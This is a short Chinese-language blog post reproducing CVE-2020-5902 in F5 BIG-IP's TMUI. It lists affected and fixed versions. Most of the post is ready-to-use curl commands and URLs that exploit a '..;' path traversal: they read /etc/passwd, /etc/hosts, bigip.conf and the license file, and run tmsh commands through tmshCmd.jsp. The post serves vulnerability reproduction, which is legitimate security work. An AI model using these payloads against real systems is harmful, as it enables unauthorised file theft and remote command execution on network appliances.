CYH博客CYH博客

天行健,
君子以自强不息。

CVE-2020-5902 BIG-IP RCE漏洞复现(附EXP)

0x01 简介

BIG-IP的TMUI存在RCE漏洞

0x02 影响范围

版本号主要如下
11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x

0x03 漏洞利用

文件读取poc

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
                 https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd 
                 https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts 
                 https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license 
                 https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf

CVE-2020-5902 BIG-IP RCE漏洞复现(附EXP)(图1)

RCE poc

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

CVE-2020-5902 BIG-IP RCE漏洞复现(附EXP)(图2)

0x04 修复方法

升级到
11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.1.0.4

参考

  1. https://twitter.com/x4ce/status/1279760648465870848


未经允许不得转载:CYH博客 » CVE-2020-5902 BIG-IP RCE漏洞复现(附EXP)
分享到: 更多 (0)

CYH博客 带给你想要内容

联系我